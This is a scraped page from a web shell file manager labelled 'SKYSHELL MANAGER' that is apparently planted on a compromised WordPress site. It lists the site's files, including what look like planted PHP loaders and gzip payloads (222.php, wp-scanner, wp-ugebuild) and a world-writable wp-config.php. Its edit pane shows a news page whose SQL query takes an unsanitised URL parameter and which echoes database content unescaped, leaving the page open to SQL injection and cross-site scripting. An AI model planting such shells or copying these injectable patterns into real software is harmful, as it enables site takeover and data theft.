📁
SKYSHELL MANAGER
PHP v8.1.29
Create
Create
Path:
root
/
var
/
www
/
html
/
wxwpsite
/
fungiftdeals
/
Name
Size
Perm
Actions
📁
wp-admin
-
0755
🗑️
🏷️
🔒
📁
wp-content
-
0755
🗑️
🏷️
🔒
📁
wp-includes
-
0755
🗑️
🏷️
🔒
📄
.htaccess
0.51 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
222.php
15.76 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
admin.php
15.76 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
index.php
0.4 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
license.txt
19.44 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
readme.html
7.23 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
robots.txt
0.07 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-activate.php
7.2 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-blog-header.php
0.34 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-comments-post.php
2.27 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-config-sample.php
3.26 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-config.php
3.54 KB
0666
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-cron.php
5.49 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-links-opml.php
2.43 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-load.php
3.84 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-login.php
50.66 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-mail.php
8.52 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-scanner.gz
21.5 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-scanner.php
0.15 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-settings.php
31.88 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-signup.php
33.94 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-trackback.php
5.09 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-ugebuild.gz
47.66 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-ugebuild.php
0.16 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-update.php
114.83 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
xmlrpc.php
3.13 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
yyj.txt
0 KB
0000
🗑️
🏷️
⬇️
✏️
🔒
Edit: blog_news.php
<!DOCTYPE html> <html> <head> <link rel="icon" href="images/fav.png"/> <title>contentevergreen</title> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="stylesheet" type="text/css" href="css/bootstrap.min.css"> <link rel="stylesheet" type="text/css" href="css/font-awesome.min.css"> <link rel="stylesheet" type="text/css" href="css/animate.css"> <link rel="stylesheet" type="text/css" href="css/slick.css"> <link rel="stylesheet" type="text/css" href="css/theme.css"> <link rel="stylesheet" type="text/css" href="css/style.css"> <!--[if lt IE 9]> <script src="assets/js/html5shiv.min.js"></script> <script src="assets/js/respond.min.js"></script> <![endif]--> </head> <body> <!--<div id="preloader"> <div id="status"> </div> </div>--> <a class="scrollToTop" href="#"><i class="fa fa-angle-up"></i></a> <div class="container"> <header id="header"> <div class="row"> <div class="col-lg-3 col-md-12"> <div class="header_bottom"> <div class="header_bottom_left"><a class="logo" href="index.php"><img src="images/logo5.png" width="200px"></a></div> <!--div class="header_bottom_right"><a><img src="images/flag.png" alt="flag"></a></div --> </div> </div> <div class="col-lg-9 col-md-12"> <div id="navarea"> <nav role="navigation"> <div class="container-fluid"> <div class="navbar-header"> <button type="button" class="navbar-toggle collapsed" data-toggle="collapse" data-target="#navbar" aria-expanded="false" aria-controls="navbar"> <span class="sr-only">Toggle navigation</span> <span class="icon-bar"></span> <span class="icon-bar"></span> <span class="icon-bar"></span> </button> </div> <div id="navbar" class="navbar-collapse collapse"> <ul class="nav navbar-nav custom_nav"> <li class="active"><a href="index.php">Home</a></li> <li><a href="world.php">World</a></li> <li><a href="finance.php">Finance</a></li> <li><a href="market.php">Market</a></li> <li><a href="technology.php">Technology</a></li> <li><a href="trending.php">Trending</a></li> <li><a href="top_news.php">Top News</a></li> </ul> </div> </div> </nav> </div> </div> </div> </header> <hr style="background-color:#000000"><section id="mainContent"> <div class="content_middle"> </div> <div class="content_bottom"> <div class="col-lg-8 col-md-8"> <div class="content_bottom_left"> <div class="games_fashion_area" style="text-align:justify;"> <?php // Get the post ID from the URL parameter if(isset($_GET['id'])) { $post_id = $_GET['id']; // Database connection details require 'db_connection.php'; // Fetch the post content from the database based on the post ID $sql = "SELECT title, content, pst_img FROM post WHERE id = $post_id"; $result = $conn->query($sql); if ($result->num_rows > 0) { // Output data of each row while($row = $result->fetch_assoc()) { // Display post content echo "<h2 class='catg_titile' style='margin: 20 0 20px';>" . $row['title'] . "</h1>"; echo "<img class='res-img1' style='width: -webkit-fill-available;margin-bottom:30px;' src='" . htmlspecialchars($row["pst_img"]) . "'><br>"; //echo "<p>" . $row['description'] . "</p>"; echo "<div class='article-bullet-list'>" . $row['content'] . "</div>"; } } else { echo "0 results"; } // Close the database connection $conn->close(); } else { echo "Post ID not provided"; } ?> </div> </div> </div> <div class="col-lg-4 col-md-4"> <div class="content_bottom_right"> <div class="single_bottom_rightbar"> <h2>Latest Stories </h2> <ul class="small_catg popular_catg wow fadeInDown"> <?php // Database connection details require 'db_connection.php'; $sql = "SELECT id, title, description, pst_img FROM post WHERE category = 'Top News' ORDER BY id DESC LIMIT 2, 3"; $result = $conn->query($sql); if ($result->num_rows > 0) { while($row = $result->fetch_assoc()) { echo '<li>'; echo '<div class="media wow fadeInDown">'; if (!empty($row["pst_img"])) { echo "<a class='media-left' href='blog_news.php?id=" . $row["id"] . "'><img class='res-img2' src='" . $row["pst_img"] . "' alt='" . $row["title"] . "'></a>"; } echo '<div class="media-body">'; echo "<h4 class='media-heading'><a href='blog_news.php?id=" . $row["id"] . "'>" . $row["title"] . "</a></h4>"; $shortDesc = substr($row["description"], 0, 100); echo "<p> <a href='blog_news.php?id=" . $row["id"] . "'> " . htmlspecialchars($shortDesc) . "... </a> </p>"; echo '</div>'; echo '</div>'; echo '</li>'; } } else { echo "0 results"; } ?> </ul> </div> <div class="single_bottom_rightbar"> <ul role="tablist" class="nav nav-tabs custom-tabs"> <li class="active" role="presentation"><a data-toggle="tab" role="tab" aria-controls="home" href="#mostPopular">Most Popular</a></li> <!--<li role="presentation"><a data-toggle="tab" role="tab" aria-controls="messages" href="#recentComent">Recent News</a></li>--> </ul> <div class="tab-content"> <div id="mostPopular" class="tab-pane fade in active" role="tabpanel"> <ul class="small_catg popular_catg wow fadeInDown"> <?php $sql = "SELECT id, title, description, pst_img FROM post WHERE category = 'Top News' ORDER BY id DESC LIMIT 5, 6"; $result = $conn->query($sql); if ($result->num_rows > 0) { while($row = $result->fetch_assoc()) { echo '<li>'; echo '<div class="media wow fadeInDown">'; if (!empty($row["pst_img"])) { echo "<a class='media-left' href='blog_news.php?id=" . $row["id"] . "'><img class='res-img2' src='" . $row["pst_img"] . "' alt='" . $row["title"] . "'></a>"; } echo '<div class="media-body">'; echo "<h4 class='media-heading'><a href='blog_news.php?id=" . $row["id"] . "'>" . $row["title"] . "</a></h4>"; $shortDesc = substr($row["description"], 0, 100); echo "<p> <a href='blog_news.php?id=" . $row["id"] . "'> " . htmlspecialchars($shortDesc) . "... </a> </p>"; echo '</div>'; echo '</div>'; echo '</li>'; } } else { echo "0 results"; } ?> </ul> </div> </div> </div> </div> </div> </section> </div> <footer id="footer"> <div class="footer_bottom"> <div class="container"> <div class="row"> <div class="col-lg-6 col-md-6 col-sm-6 col-xs-12"> <div class="center"> <p>Copyright © 2025 Content Evergreen. All rights reserverd. <a href="privacy.php" style="color:#fff"> || Privacy Policy</a><a href="terms.php" style="color:#fff"> || Terms & Conditions</a><a href="contact.php" style="color:#fff"> || Help</a></p> </div> </div> </div> </div> </div> </footer> <script src="js/jquery.min.js"></script> <script src="js/bootstrap.min.js"></script> <script src="js/wow.min.js"></script> <script src="js/slick.min.js"></script> <script src="js/custom.js"></script> </body> </html>
Save